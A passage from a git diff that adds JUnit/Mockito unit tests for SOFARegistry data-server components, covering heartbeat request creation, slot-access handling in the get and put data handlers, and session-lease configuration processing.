Assert.assertNotNull(resp.getData()); + + // npe + handler.setSlotManager(null); + resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertNull(resp.getData()); + } + + private static DataSlotDiffPublisherRequest request(int slotId, List summaries) { + return new DataSlotDiffPublisherRequest(1, slotId, summaries); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerServiceImplTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerServiceImplTest.java new file mode 100644 index 000000000..d79a11ec4 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/MetaServerServiceImplTest.java @@ -0,0 +1,151 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver; + +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.FollowerSlotStatus; +import com.alipay.sofa.registry.common.model.slot.LeaderSlotStatus; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.data.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.List; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mockito; + +public class MetaServerServiceImplTest { + private static final Logger LOGGER = LoggerFactory.getLogger(MetaServerServiceImplTest.class); + private MetaServerServiceImpl impl; + private DataServerConfig dataServerConfig; + private SlotManager slotManager; + + @Before + public void beforeMetaServerServiceImplTest() { + init(); + } + + @Test + public void testCreateRequest() { + LeaderSlotStatus leaderSlotStatus = + new LeaderSlotStatus(10, 20, "xxx", BaseSlotStatus.LeaderStatus.HEALTHY); + FollowerSlotStatus followerSlotStatus = + new FollowerSlotStatus( + 11, 30, "yyy", System.currentTimeMillis(), System.currentTimeMillis()); + LOGGER.info("leaderStatus={}, followerStatus={}", leaderSlotStatus, followerSlotStatus); + + List list = Lists.newArrayList(leaderSlotStatus, followerSlotStatus); + when(slotManager.getSlotTableEpochAndStatuses()).thenReturn(Tuple.of(100L, list)); + + Assert.assertEquals(impl.getCurrentSlotTableEpoch(), slotManager.getSlotTableEpoch()); + final long now = System.currentTimeMillis(); + HeartbeatRequest heartbeatRequest = impl.createRequest(); + LOGGER.info("hb={}", heartbeatRequest); + + Assert.assertEquals(heartbeatRequest.getDataCenter(), dataServerConfig.getLocalDataCenter()); + Assert.assertEquals(heartbeatRequest.getDuration(), 0); + DataNode dataNode = (DataNode) heartbeatRequest.getNode(); + Assert.assertEquals(dataNode.getDataCenter(), dataServerConfig.getLocalDataCenter()); + Assert.assertEquals(dataNode.getNodeUrl().getIpAddress(), ServerEnv.IP); + + Assert.assertTrue(heartbeatRequest.getTimestamp() >= now); + Assert.assertTrue(heartbeatRequest.getTimestamp() <= System.currentTimeMillis()); + + Assert.assertEquals(heartbeatRequest.getSlotTableEpoch(), 100); + Assert.assertEquals(heartbeatRequest.getSlotStatus().get(0), leaderSlotStatus); + Assert.assertEquals(heartbeatRequest.getSlotStatus().get(1), followerSlotStatus); + + Assert.assertNull(heartbeatRequest.getSlotTable()); + } + + @Test + public void testHandle() { + impl = Mockito.spy(impl); + DataNodeExchanger dataNodeExchanger = new DataNodeExchanger(); + SessionNodeExchanger sessionNodeExchanger = new SessionNodeExchanger(); + impl.setDataNodeExchanger(dataNodeExchanger); + impl.setSessionNodeExchanger(sessionNodeExchanger); + + when(impl.getSessionServerList()).thenReturn(Sets.newHashSet("s1", "s2")); + when(impl.getDataServerList()).thenReturn(Sets.newHashSet("d1", "d2")); + + BaseHeartBeatResponse resp = + new BaseHeartBeatResponse( + false, + new VersionedList(10, Collections.emptyList()), + null, + new VersionedList(10, Collections.emptyList()), + "xxx", + 100); + + impl.handleRenewResult(resp); + Assert.assertEquals(sessionNodeExchanger.getServerIps(), impl.getSessionServerList()); + Assert.assertEquals(dataNodeExchanger.getServerIps(), impl.getDataServerList()); + Mockito.verify(slotManager, Mockito.times(0)).updateSlotTable(Mockito.anyObject()); + + SlotTable slotTable = new SlotTable(10, Collections.emptyList()); + resp = + new BaseHeartBeatResponse( + false, + new VersionedList(10, Collections.emptyList()), + slotTable, + new VersionedList(10, Collections.emptyList()), + "xxx", + 100); + + impl.handleRenewResult(resp); + Mockito.verify(slotManager, Mockito.times(1)).updateSlotTable(Mockito.anyObject()); + } + + @Test + public void testNotifySlotTable() { + when(slotManager.getSlotTableEpochAndStatuses()) + .thenReturn(new Tuple<>(1L, Lists.newArrayList())); + impl.record(new SlotTable(1L, Lists.newArrayList())); + long slotTableEpoch = impl.createRequest().getSlotTableEpoch(); + Assert.assertEquals(1L, slotTableEpoch); + Assert.assertEquals(1L, impl.createRequest().getSlotTable().getEpoch()); + } + + private void init() { + impl = new MetaServerServiceImpl(); + dataServerConfig = TestBaseUtils.newDataConfig("testDc"); + + impl.setDataServerConfig(dataServerConfig); + Assert.assertEquals( + impl.getRenewIntervalSecs(), dataServerConfig.getSchedulerHeartbeatIntervalSecs()); + + slotManager = Mockito.mock(SlotManager.class); + impl.setSlotManager(slotManager); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/NotifyProvideDataChangeHandlerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/NotifyProvideDataChangeHandlerTest.java new file mode 100644 index 000000000..13556e2f3 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/NotifyProvideDataChangeHandlerTest.java @@ -0,0 +1,77 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver.handler; + +import static org.mockito.Matchers.anyString; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.ProvideDataProcessorManager; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import org.junit.Assert; +import org.junit.Test; + +public class NotifyProvideDataChangeHandlerTest { + @Test + public void testCheckParam() { + NotifyProvideDataChangeHandler handler = newHandler(); + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request(null, 10)); + }); + + handler.checkParam(request("111", 10)); + } + + private NotifyProvideDataChangeHandler newHandler() { + NotifyProvideDataChangeHandler handler = new NotifyProvideDataChangeHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), ProvideDataChangeEvent.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.META); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + CommonResponse failed = (CommonResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + return handler; + } + + @Test + public void testHandle() { + NotifyProvideDataChangeHandler handler = newHandler(); + handler.setProvideDataProcessorManager(new ProvideDataProcessorManager()); + MetaServerService svc = mock(MetaServerService.class); + when(svc.fetchData(anyString())).thenReturn(new ProvideData(null, "test", 100L)); + handler.setMetaServerService(svc); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + ProvideDataChangeEvent request = request("testDataId", 100); + + Object obj = handler.doHandle(channel, request); + Assert.assertNull(obj); + } + + private static ProvideDataChangeEvent request(String dataInfoId, long version) { + return new ProvideDataChangeEvent(dataInfoId, version); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/processor/SessionLeaseProvideDataProcessorTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/processor/SessionLeaseProvideDataProcessorTest.java new file mode 100644 index 000000000..cf4526a29 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/processor/SessionLeaseProvideDataProcessorTest.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.processor; + +import com.alipay.sofa.registry.common.model.ServerDataBox; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.ProvideDataProcessorManager; +import org.junit.Assert; +import org.junit.Test; + +public class SessionLeaseProvideDataProcessorTest { + + @Test + public void test() { + final SessionLeaseProvideDataProcessor processor = new SessionLeaseProvideDataProcessor(); + DataServerConfig cfg = TestBaseUtils.newDataConfig("testDc"); + processor.setDataServerConfig(cfg); + ProvideData provideData = new ProvideData(null, "test", 100L); + Assert.assertFalse(processor.support(provideData)); + + provideData = new ProvideData(null, ValueConstants.DATA_SESSION_LEASE_SEC, 100L); + Assert.assertTrue(processor.support(provideData)); + + int prev = cfg.getSessionLeaseSecs(); + processor.changeDataProcess(null); + Assert.assertEquals(prev, cfg.getSessionLeaseSecs()); + + processor.changeDataProcess(new ProvideData(null, ValueConstants.DATA_SESSION_LEASE_SEC, 100L)); + Assert.assertEquals(prev, cfg.getSessionLeaseSecs()); + + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + ServerDataBox box = new ServerDataBox("3"); + processor.changeDataProcess( + new ProvideData(box, ValueConstants.DATA_SESSION_LEASE_SEC, 100L)); + }); + + ServerDataBox box = new ServerDataBox("10"); + processor.changeDataProcess(new ProvideData(box, ValueConstants.DATA_SESSION_LEASE_SEC, 100L)); + Assert.assertEquals(10, cfg.getSessionLeaseSecs()); + + ProvideDataProcessorManager mgr = new ProvideDataProcessorManager(); + mgr.addProvideDataProcessor(processor); + Assert.assertFalse(mgr.support(null)); + + box = new ServerDataBox("20"); + mgr.changeDataProcess(new ProvideData(box, ValueConstants.DATA_SESSION_LEASE_SEC, 100L)); + Assert.assertEquals(20, cfg.getSessionLeaseSecs()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/BatchPutDataHandlerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/BatchPutDataHandlerTest.java new file mode 100644 index 000000000..354873e6f --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/BatchPutDataHandlerTest.java @@ -0,0 +1,151 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; + +import static org.mockito.Matchers.anyInt; +import static org.mockito.Matchers.anyLong; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.PublishType; +import com.alipay.sofa.registry.common.model.dataserver.BatchRequest; +import com.alipay.sofa.registry.common.model.dataserver.ClientOffPublisher; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.UnPublisher; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.google.common.collect.Lists; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class BatchPutDataHandlerTest { + private final ConnectId connectId = ConnectId.of("localhost:8888", "localhost:9999"); + + @Test + public void testCheckParam() { + final BatchPutDataHandler handler = newHandler(); + BatchRequest request = request(connectId, false); + handler.checkParam(request); + + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request(null, false)); + }); + + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request(connectId, true)); + }); + } + + private BatchPutDataHandler newHandler() { + BatchPutDataHandler handler = new BatchPutDataHandler(); + Assert.assertEquals(handler.interest(), BatchRequest.class); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.SESSION); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + SlotAccessGenericResponse failed = + (SlotAccessGenericResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + handler.sessionLeaseManager = new SessionLeaseManager(); + SlotManager slotManager = mock(SlotManager.class); + handler.slotManager = slotManager; + handler.localDatumStorage = TestBaseUtils.newLocalStorage("testDc", true); + handler.dataChangeEventCenter = new DataChangeEventCenter(); + handler.dataServerConfig = TestBaseUtils.newDataConfig("testDc"); + return handler; + } + + @Test + public void testHandle() { + BatchPutDataHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.accept()); + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.doHandle(channel, request(connectId, true)); + }); + + BatchRequest request = request(connectId, false); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.accept()); + SlotAccessGenericResponse resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.accept().getStatus()); + } + + @Test + public void testHandleErrorSlotAccess() { + BatchPutDataHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + BatchRequest request = request(connectId, false); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.moved()); + SlotAccessGenericResponse resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.moved().getStatus()); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.misMatch()); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.misMatch().getStatus()); + } + + private static BatchRequest request(ConnectId connectId, boolean illegalArg) { + Publisher pub1 = TestBaseUtils.createTestPublisher("testDataId"); + Publisher pub2 = TestBaseUtils.createTestPublisher("testDataId"); + + ClientOffPublisher off = new ClientOffPublisher(connectId); + off.addPublisher(pub2); + Assert.assertFalse(off.isEmpty()); + Assert.assertEquals(off.getConnectId(), connectId); + Assert.assertEquals( + off.getPublisherMap().get(pub2.getDataInfoId()).get(pub2.getRegisterId()), + pub2.registerVersion()); + List list = Lists.newArrayList(pub1, off); + if (illegalArg) { + list.add(new Object()); + } + // add unpub + Publisher pub3 = TestBaseUtils.createTestPublisher("testDataId"); + list.add(UnPublisher.of(pub3)); + // add temp + Publisher pub4 = TestBaseUtils.createTestPublisher("testDataId"); + pub4.setPublishType(PublishType.TEMPORARY); + list.add(pub4); + BatchRequest req = new BatchRequest(ServerEnv.PROCESS_ID, 10, list); + return req; + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataHandlerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataHandlerTest.java new file mode 100644 index 000000000..eb7308655 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataHandlerTest.java @@ -0,0 +1,149 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; + +import static org.mockito.Matchers.anyInt; +import static org.mockito.Matchers.anyLong; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.GetDataRequest; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import org.junit.Assert; +import org.junit.Test; + +public class GetDataHandlerTest { + + @Test + public void testCheckParam() { + GetDataHandler handler = newHandler(); + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request(null, "xxx")); + }); + + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request("xx", null)); + }); + + handler.checkParam(request("xx", "xx")); + } + + private GetDataHandler newHandler() { + GetDataHandler handler = new GetDataHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), GetDataRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.SESSION); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + SlotAccessGenericResponse failed = + (SlotAccessGenericResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + handler.sessionLeaseManager = new SessionLeaseManager(); + SlotManager slotManager = mock(SlotManager.class); + handler.slotManager = slotManager; + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + handler.setDatumCache(datumCache); + handler.localDatumStorage = datumCache.getLocalDatumStorage(); + handler.dataChangeEventCenter = new DataChangeEventCenter(); + handler.dataServerConfig = TestBaseUtils.newDataConfig("testDc"); + return handler; + } + + @Test + public void testHandle() { + GetDataHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + GetDataRequest request = request("testDc", "testDataId"); + + // get nil + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.accept(), TestBaseUtils.accept()); + SlotAccessGenericResponse resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.accept().getStatus()); + Assert.assertNull(resp.getData()); + + // get leader change + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.accept(), TestBaseUtils.migrating(1, 10, 100)); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.migrating().getStatus()); + Assert.assertNull(resp.getData()); + + // get success + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.accept()); + Publisher pub = TestBaseUtils.createTestPublishers(1, 1).get(0); + request = request("testDc", pub.getDataInfoId()); + handler.localDatumStorage.put(pub); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.accept().getStatus()); + SubDatum subDatum = (SubDatum) resp.getData(); + Assert.assertEquals(subDatum.getPublishers().size(), 1); + Assert.assertEquals(subDatum.getPublishers().get(0).getRegisterId(), pub.getRegisterId()); + Assert.assertEquals( + subDatum.getPublishers().get(0).getRegisterTimestamp(), pub.getRegisterTimestamp()); + Assert.assertEquals(subDatum.getPublishers().get(0).getVersion(), pub.getVersion()); + } + + @Test + public void testHandleErrorSlotAccess() { + GetDataHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + GetDataRequest request = request("testDc", "testDataId"); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.moved()); + SlotAccessGenericResponse resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.moved().getStatus()); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.misMatch()); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.misMatch().getStatus()); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.migrating()); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.migrating().getStatus()); + } + + private static GetDataRequest request(String dataCenter, String dataInfoId) { + return new GetDataRequest(ServerEnv.PROCESS_ID, dataInfoId, dataCenter, 10); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataVersionsHandlerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataVersionsHandlerTest.java new file mode 100644 index 000000000..241d336b3 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataVersionsHandlerTest.java @@ -0,0 +1,162 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; + +import static org.mockito.Matchers.anyInt; +import static org.mockito.Matchers.anyLong; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.dataserver.GetDataVersionRequest; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.util.Collections; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +public class GetDataVersionsHandlerTest { + @Test + public void testCheckParam() { + GetDataVersionsHandler handler = newHandler(); + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request(Collections.EMPTY_MAP, -1)); + }); + handler.checkParam(request(Collections.EMPTY_MAP, 10)); + } + + private GetDataVersionsHandler newHandler() { + GetDataVersionsHandler handler = new GetDataVersionsHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), GetDataVersionRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.SESSION); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + SlotAccessGenericResponse failed = + (SlotAccessGenericResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + handler.sessionLeaseManager = new SessionLeaseManager(); + SlotManager slotManager = mock(SlotManager.class); + handler.slotManager = slotManager; + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + handler.setDatumCache(datumCache); + handler.localDatumStorage = datumCache.getLocalDatumStorage(); + handler.dataChangeEventCenter = new DataChangeEventCenter(); + handler.dataServerConfig = TestBaseUtils.newDataConfig("testDc"); + return handler; + } + + @Test + public void testHandle() { + GetDataVersionsHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + Publisher pub = TestBaseUtils.createTestPublishers(10, 1).get(0); + DatumVersion v = new DatumVersion(DatumVersionUtil.nextId()); + GetDataVersionRequest request = + request(Collections.singletonMap(pub.getDataInfoId() + 1, v), 10); + + // get status change + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.accept(), TestBaseUtils.migrating(1, 10, 10)); + + SlotAccessGenericResponse resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + + // get not exist + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.accept(), TestBaseUtils.accept()); + + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.accept().getStatus()); + Map ret = (Map) resp.getData(); + Assert.assertEquals(ret.size(), 1); + DatumVersion retV = ret.get(pub.getDataInfoId() + 1); + Assert.assertTrue(retV.getValue() > v.getValue()); + Assert.assertEquals( + 